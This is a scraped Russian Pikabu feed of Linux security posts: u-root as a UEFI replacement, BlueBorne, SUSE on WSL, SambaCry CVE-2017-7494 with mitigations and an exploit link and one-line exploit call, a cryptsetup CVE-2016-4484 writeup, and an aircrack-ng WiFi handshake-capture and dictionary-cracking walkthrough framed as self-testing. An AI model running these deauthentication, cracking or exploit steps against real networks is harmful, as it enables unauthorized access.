U-root написан на языке Go и включает в себя легковесную систему инициализации, оболочку rush и набор типовых утилит, таких как cp, mv, ls, grep, sort, dd, insmod, wget, netcat и т.п. Примечательно, что в формируемый при помощи u-root образ корневой ФС включается лишь процесс инициализации и несколько исполняемых файлов с компилятором языка Go. Все команды собираются только при необходимости - если запущенная утилита не была собрана ранее, то её компиляция осуществляется на лету после попытки первого запуска. Результат компиляции вызванной утилиты помещается в tmpfs и доступен для повторного использования в рамках текущего сеанса.


Таким образом, в u-root все утилиты предлагаются в исходных текстах, а для адаптации инструментария требуется лишь настройка компилятора. Компиляция занимает доли секунды и не приводит к ощутимым задержкам при вызове. Подобный подход позволяет сделать образ u-root универсальным и распространять единый образ корневой ФС для всех платформ, поддерживаемых компилятором языка Go (для каждой новой архитектуры требуется лишь подготовить 4 исполняемых файла, в одном образе могут содержаться сборки компилятора для разных архитектур). Дополнительно предусмотрены варианты c компиляцией всех утилит во время загрузки или поставки готовых сборок (для минимизации размера прошивки все утилиты могут быть собраны в один исполняемый файл, по аналогии с busybox).

Google развивает открытую замену прошивкам UEFI Google, Nerf, Uefi, Coreboot, u-Root, Закладки, Уязвимость, Linux, Видео, Длиннопост

Необходимость замены UEFI обусловлена тем, что на современных компьютерах параллельно с основной операционной системой параллельно выполняется ещё несколько неконтролируемых программных окружений (UEFI, SMM, Intel ME), которые формируются на основе проприетарных прошивок. Код UEFI продолжает работать после загрузки основной ОС и выполняется на уровне кольца защиты Ring -2. Данные закрытые окружения создают дополнительные угрозы безопасности. Например, внедрённый в прошивку UEFI вредоносный код может оставаться невидимым из основной ОС, но полностью контролировать всю систему.

Google развивает открытую замену прошивкам UEFI Google, Nerf, Uefi, Coreboot, u-Root, Закладки, Уязвимость, Linux, Видео, Длиннопост

В частности, ресурс WikiLeaks в этом году раскрыл сведения о разработке в ЦРУ имплантов для контроля за системой, внедряемых в прошивки UEFI. Современные прошивки сильно усложнены и включают многие атрибуты обычных ОС, включая TCP-стек, http-сервер, DHCP, драйверы, файловые системы и web-интерфейс. С учётом значительного размера кодовой базы прошивок UEFI, которая составляет около 2 млн строк кода, и недоступностью кода прошивок для независимого аудита, также возникают опасения о наличии в прошивках большого количества неисправленных уязвимостей.

Источник

Показать полностью 2 1
269

Отключайте Bluetooth, или же уязвимость "BlueBorne"

Всем привет. Наверняка, в вашем телефоне/компьютере/планшете и т.д. есть Bluetooth. Оказывается, если вы его не отключаете в публичных местах это может повлечь за собой серьезные последствия. Например, над вашим телефоном будет полностью перехвачен контроль, а вы и не заметите.

Отключайте Bluetooth, или же уязвимость "BlueBorne" Вирус, Bluetooth, Android, Windows, Linux, Уязвимость, Привет читающим теги

Сначала, злоумышленник смотрит, какие есть устройства со включенным Bluetooth поблизости. Допустим, он нашел ваш телефон. Определяет MAC-адрес и операционную систему, которую вы используете. Далее, он уже может делать все что угодно, лучше всего показывает эту уязвимость данный ролик: https://www.youtube.com/watch?v=Az-l90RCns8 (Пикабу запрещает мне публиковать видео прямо в посте :( )


Из этого всего можно сделать вывод, то что даже если вы используете антивирус, не подключаетесь к публичным Wi-Fi сетям, но забыли выключить Bluetooth, то любой предприимчивый хакер может перехватить контроль над вашим банковским приложением через Bluetooth.


Отключайте Bluetooth, товарищи пикабушники.

87

В Магазине Windows опубликовано два дистрибутива SUSE Linux

Ещё несколько лет назад за такой заголовок вполне можно было получить путёвку в санаторий для душевнобольных, но в мире сегодняшней Microsoft он звучит вполне нормально: просто для Windows 10 и WSL (Bash) доступны новые дистрибутивы Linux, обещанные некоторое время назад.
Напомню, впервые энтузиасты запустили SUSE в среде WSL ещё в январе этого года, в мае разработчики Windows 10 официально сообщили о намерении расширить список поддерживаемых дистрибутивов, включив в него кроме Ubuntu ещё и SUSE, и Fedora. В конечном счёте разработчики WSL планируют сделать эту платформу независимой от типа дистрибутива вообще.

В Магазине Windows опубликовано два дистрибутива SUSE Linux Windows, Windows 10, Linux, Linux и Windows, Командная оболочка bash, Microsoft, Операционная система

В каталоге Магазина Windows сейчас представлено два дистрибутива SUSE: openSUSE Leap 42, предназначенный широкому кругу пользователей, и созданный на его основе, «коммерческий» SUSE Linux Enterprise Server 12. Распространяются они бесплатно, для использования необходимо включить WSL (Bash).

144

Критическая уязвимость SambaCry: как защититься.

Критическая уязвимость SambaCry: как защититься. Linux, Samba, Уязвимость, Sambacry, Актуально, 2017
В популярном пакете для создания сетевых дисков на различных ОС Samba обнаружена критическая уязвимость, позволяющая удаленно получать контроль над Linux и Unix-системами. Ошибка просуществовала 7 лет — уязвимости CVE-2017-7494 подвержены все версии пакета, начиная с Samba 3.5.0, который вышел 1 марта 2010 года. Сегодня мы поговорим о том, как защититься от этой уязвимости.

Код эксплоита https://github.com/omri9741/cve-2017-7494

Уязвимы также большое количество маршрутизаторов и NAS компании Netgear, которая опубликовала по этому поводу собственный бюллетень безопасности.

Как защититься



Разработчики Samba сообщили об устранении уязвимости в последних версиях пакета (4.6.4/4.5.10/4.4.14) — пользователям рекомендуется как можно скорее установить патч. В том случае, если переход на более свежую версию пакета невозможен, создатели продукта рекомендуют внести изменения в конфигурационный файл smb.conf, добавив в секцию [global] строку:


nt pipe support = no

После этого следует перезапустить демон SMB (smbd). Эти изменения заблокируют возможность полного доступа клиентов к сетевым машинам и ограничат функциональность подключенных Windows-систем. Позднее были опубликованы патчи и для более старых версий Samba.


Заблокировать возможность осуществления атаки можно с помощью политик SELinux — к примеру, конфигурация RHEL по-умолчанию не позволяет злоумышленникам эксплуатировать уязвимость в Samba.


Компания GuardiCore разработала скрипт для выявления атаки — для его скачивания необходимо заполнить форму на сайте.


В свою очередь эксперты Positive Technologies создали сигнатуру Suricata, которая позволяет выявлять попытки эксплуатации уязвимости CVE-2017-7494 в Samba

Кроме того, для снижения рисков успешной атаки с помощью этой ошибки специалисты компании рекомендуют устанавливать общим папкам права лишь на чтение, но не на запись файлов (о том, как это сделать, можно прочитать в этой инструкции). Найти все сетевые папки с правами на запись может быть непросто — для этого следует использовать, например, инструмент nmap. Увидеть все «шары» с правами на запись можно с помощью следующей команды (смотреть нужно в Current user access):


nmap --script smb-enum-shares.nse -p445 <host>

Кроме того, рекомендуется проанализировать права доступа к сетевым папкам, оставив права на чтение и запись из них только для определенных доверенных пользователей с помощью контрольных списков.

Показать полностью
94

Внимание! Linux-версия эксплойта EternalBlue

Внимание! Linux-версия эксплойта EternalBlue Samba, Linux, Smb, Sambacry, Уязвимость, Habr, Длиннопост

В сетевом программном обеспечении Samba обнаружена критическая уязвимость 7-летней давности, обеспечивающая возможность удалённого выполнение кода. Эта брешь может позволить злоумышленнику взять под контроль уязвимые машины Linux и Unix.


Samba — это программное обеспечение с открытым исходным кодом (иная реализация сетевого протокола SMB), которое работает в большинстве доступных сегодня операционных систем, включая Windows, Linux, UNIX, IBM System 390 и OpenVMS.


Samba позволяет другим операционным системам, отличным от Windows, таким как GNU / Linux или Mac OS X, совместно использовать общие сетевые папки, файлы и принтеры с операционной системой Windows.


Недавно обнаруженная уязвимость удаленного выполнения кода (CVE-2017-7494) затрагивает все версии новее, чем Samba 3.5.0, которая выпущена 1 марта 2010 года.


«Все версии Samba, начиная с 3.5.0, подвержены уязвимости удаленного запуска кода, позволяя злоумышленникам загружать библиотеку совместного использования в доступный для записи общий ресурс, чтобы затем заставить сервер выполнить вредоносный код», — сообщила компания Samba в среду.


По данным поисковой машины Shodan, найдено более 485 000 компьютеров с поддержкой Samba и открытым портом 445. По данным исследователей из Rapid7, более 104 000 компьютеров с открытым портом используют уязвимые версии Samba, причём 92 000 с неподдерживаемыми версиями Samba.

Внимание! Linux-версия эксплойта EternalBlue Samba, Linux, Smb, Sambacry, Уязвимость, Habr, Длиннопост

Поскольку Samba является SMB протоколом, реализованным в системах Linux и UNIX, некоторые эксперты говорят об этом, как о «версии EternalBlue для Linux» или даже SambaCry.


Учитывая количество уязвимых систем и простоту использования этой уязвимости, недостаток Samba может стать новой масштабной проблемой. Домашние сети с подключенными к сети устройствами хранения (NAS) также в зоне риска.

Код эксплойта опубликован

Этот эксплойт может быть легко использован преступниками. Для выполнения вредоносного кода в поражённой системе требуется всего одна строка кода.


simple.create_pipe("/path/to/target.so")



Эксплойт Samba уже перенесен на платформу Metasploit Framework, что позволяет исследователям и хакерам легко его изучить.


Как защититься?


В новых версиях Samba 4.6.4 / 4.5.10 / 4.4.14 эта проблема уже исправлена. Настоятельно рекомендуется тем, кто использует уязвимую версию, установить патч как можно скорее.


Но если вы не можете сразу обновиться до последних версий, обойти эту уязвимость, можно добавив следующую строку в свой файл конфигурации smb.conf:


nt pipe support = no



После перезапустите SMB daemon (smbd). На этом — всё. Это изменение не позволит получить полный доступ к сетевым машинам, а также отключит некоторые функции для подключенных Windows-систем.


Red Hat и Ubuntu уже выпустили исправленные версии для своих пользователей. Однако, риск заключается в том, что пользователи сетевых хранилищ (NAS) не обновляются так быстро.


Крейг Уильямс (Craig Williams) из Cisco сказал, что, учитывая тот факт, что большинство NAS-устройств запускают Samba и хранят очень ценные данные, эта уязвимость «может стать первым крупномасштабным червем Ransomware для Linux».


Позднее разработчики Samba также предоставили патчи для более старых и неподдерживаемых версий Samba.


Между тем, Netgear выпустил рекомендации по безопасности для CVE-2017-7494, заявив, что большое количество их маршрутизаторов и NAS-устройств подвержены уязвимости из-за использования Samba версии 3.5.0 или более поздней. В настоящее время компания выпустила исправления только для продуктов ReadyNAS под управлением OS 6.x.

Честно схабрено.

Показать полностью 1
118

Тестирование на проникновение и усиление безопасности Вашей WiFi сети. Kali Linux

Здравствуйте.

Сразу хочу оговориться, что данный пост имеет рекламный мотив. Нет, я не впариваю Вам вейпы или ножи-кредитки. Я размещаю полезную информацию для IT-Специалистов в своем Telegram канале и буду рад поделится своим опытом с Вами. Вот ссылка на канал https://telegram.me/to_sysadmins заходите, читайте, используйте в работе.

_____________________________________________________________________________________________________________________________

Сегодня речь пойдет о пентесте беспроводных сетей с помощью дистрибутива Kali Linux. В нем уже предустановлено достаточно утилит для тестирования "дыр" в безопасности сетей. В этом посте мы рассмотрим

перехват handshake и брут пароля.

Тестирование на проникновение и усиление безопасности Вашей WiFi сети. Kali Linux Linux, Безопасность, Взлом, IT, Сеть, Wi-Fi, Полезное, Иркутск, Длиннопост

Первым этапом будет настройка wifi адаптера. Для того, чтобы убедится,

Что Ваш адаптер поддерживает инъекции мы откроем терминал и введем команду:

airmon-ng

Терминал выведет список ваших беспроводных карт, поддерживающих

инъекции.Вероятнее всего Ваш адаптер будет называться "wlan0"

Дальше мы вводим в терминал команду:

airmon-ng start wlan0

airmon переведет адаптер в режим монитора. Дальше мы соберем информацию

о нашей сети. Для этого в пишем:

airodump-ng wlan0mon
Тестирование на проникновение и усиление безопасности Вашей WiFi сети. Kali Linux Linux, Безопасность, Взлом, IT, Сеть, Wi-Fi, Полезное, Иркутск, Длиннопост

Обратите внимание, что "wlan0mon" это название моего адаптера, убедитесь, что ввели

правильное название, возможно у Вас будет просто mon0. Так что перепроверьте.

Если все сделано верно, то на экране вы увидите вписок доступных Вам сетей,

Находим Вашу сеть и вводим команду, заменяя коментарии в скобках на свои данные

airodump-ng -c (канал) --bssid (bssid) -w /root/Desktop/ (интерфейс монитора)

Теперь Вы будете видеть и отслеживать только выбранную вами (Вашу) сеть.

оставляем airodump работать, а сами ускорим процесс захвата handshake.

Открываем второе окно терминала и пишем

aireplay-ng -0 2 -a (bssid маршрутизатора) -c (Номер клиентской станции берем в окне с работающим airodump-ng) wlan0mon

Этой командной мы принудительно отключаем клиента от нашей точки. Когда клиентское устройство

Повторно подключится к сети, мы успешно перехватим handshake.

Переходим на первое окно с работающим airodump-ng и убеждаемся в этом.

Тестирование на проникновение и усиление безопасности Вашей WiFi сети. Kali Linux Linux, Безопасность, Взлом, IT, Сеть, Wi-Fi, Полезное, Иркутск, Длиннопост

Теперь у нас на руках имеется пароль от WiFi сети, лежит он на рабочем столе в файле с разрешением *.cap

Но он пока зашифрован.Нам нужен словарь (в Kali Linux словарь уже есть и лежит

в папке /usr/share/wordlist/rockyou.txt) пароль нужно подбирать.

Для этого пишем в терминале:

aircrack-ng -a2 -b (bssid маршрутизатора) -w (путь к словарю) /Root/Desktop/*. cap

Скорость перебора зависит от мощности вашего компьютера. Если ваш компьютер слабоват

для такого рода действий, то в интернете есть как платные, так и бесплатные сервисы

расшифровки рукопожатий.

Если пароль расшифровать не удалось, то поздравляю Ваша сеть хорошо

защищена, в противном случае Вам необходимо сменить пароль на более сложный

И обязательно отключить протокол WPS в роутере.

Показать полностью 1
143

Псевдо защита от "плаксы"

На волне шумихи вокруг WannaCry появились "доброхоты" якобы помогающие защититься от новомодного вируса.
Сейчас как раз восстанавливаю последствия "паранои" и "псевдо-защиты" от "плаксы".....
Девочке рекламный баннер написал, что нужно защититься от вируса и она согласилась - ей поставили некую "чистилку" и "аваст" - после этого доступ к сетевым папкам пропал как класс...
Откатился на предыдущую точку восстановления и все снова заработало! ;)

Псевдо защита от "плаксы" Wannacry, Linux и Windows, Linux, Windows, Информационная безопасность, Сисадмин, Взлом, Компьютерные сети

Заодно решил проверить всю Сервисную сеть на уязвимости и к сожалению нашёл несколько Windows Server 2000 и 2003 с рядом уязвимостей, среди которых был сервер отвечающий за телефонию, на котором "админ" VoIP додумался в качестве Админской учётки использовать связку логин/пароль 1111, а на других серверах его зоны ответственности был чуть более секьюрный логин "Администратор" и пароль "12345678". Разговоры с этим недо-админом и нашим начальством ни к чему хорошему не привели, кроме того, что мне сделали выговор, что я полез в чужие сервера и оклеветал классного специалиста, гордость конторы и семьянина воспитывающего маленького ребёнка...

Псевдо защита от "плаксы" Wannacry, Linux и Windows, Linux, Windows, Информационная безопасность, Сисадмин, Взлом, Компьютерные сети
Показать полностью 1
357

Через Cryptsetup можно получить доступ к root shell, если зажать Enter на 70 секунд.

Через Cryptsetup можно получить доступ к root shell, если зажать Enter на 70 секунд. Уязвимость, Cryptsetup, Linux

В кoнце 2015 года испанский исследователь Гектор Марко (Hector Marco) нашел неприятный баг, который позволял обойти авторизацию в GRUB 2. Окaзалось, что если нажать клавишу Backspace 28 раз в тот момент, когда GRUB спроcит имя пользователя, система перезагрузится или появится rescue shell. Получив доступ к конcоли восстановления, атакующий, по сути, может делать с системой все, что ему вздумaется.



2016 год Марко завершает обнаружением еще одного похожeго бага: CVE-2016-4484. В ходе изучения утилиты Cryptsetup, исследователь обнаружил, что если зажать клавишу Enter на 70 секунд, пoльзователь попадет в root shell initramfs или Dracut. Хотя диски при этом все равно остаются зашифровaны, атакующий сможет скопировать такой раздел (например, для пoследующего взлома) или добраться до содержимого незашифрованных разделoв.



В своем блоге Марко пишет, что сначала он обнаружил проблему повторным вводом пароля. Когда Cryptsetup запрашивает у пользователя пароль для расшифровки диcков, файл скрипта /scripts/local-top/cryptroot срабатывает некорректно. Когда пользователь уже истратил три пoпытки (по умолчанию), дающиеся на ввод пароля, Cryptsetup считает, что просто работает на мeдленном устройстве, которому нужно больше времени на «прогрев». В итоге утилита пoзволяет пользователю продолжать подбор пaроля, перегружая процедуру аутентификации. Суммарно пользователю дается до 30 пoпыток на x86 архитектуре (можно перебрать 93 пароля) и 150 попыток на PowerPC.



Для полноценного брутфоpса этого определенно не хватит, но затем Марко обнаружил и другую, куда более нeприятную проблему. Когда пользователь истратил все свои попытки и лимит пoпыток монтирования уже превышен, происходит «вылет» в root shell, очевидно, для дебаггинга. По сути, после запроса на ввод пароля атакующему достаточно зажать клавишу Enter и подoждать 70 или более секунд, и дело сделано. Дальше возможны самые разные сценарии: эскалaция привилегий (так как раздел /boot не шифруется и можно подменить загрузочные файлы или внeдрить туда файл с SetUID), доступ к незашифрованной информации или кража зашифровaнных разделов. Наконец, атакующий может попросту уничтожить все дaнные, подложив жертве большую свинью.

Через Cryptsetup можно получить доступ к root shell, если зажать Enter на 70 секунд. Уязвимость, Cryptsetup, Linux
Проблема CVE-2016-4484 актуальна для дистрибутивов на базе Debian (к примеру, Ubuntu) и Fedora. Хотя разpаботчики Cryptsetup уже представили исправление, добавив его в версию 2:1.7.3-2, стабильная вeтка пока исправления не получила. В своем блоге Марко приводит ряд спoсобов защиты от подобных атак, которыми можно воспользовaться, пока разработчики дистрибутивов не представили патчи.

Источник: https://xakep.ru/2016/11/15/cryptsetup-flaw/?utm_source=emai...

Показать полностью 1
Похожие посты закончились. Возможно, вас заинтересуют другие посты по тегам: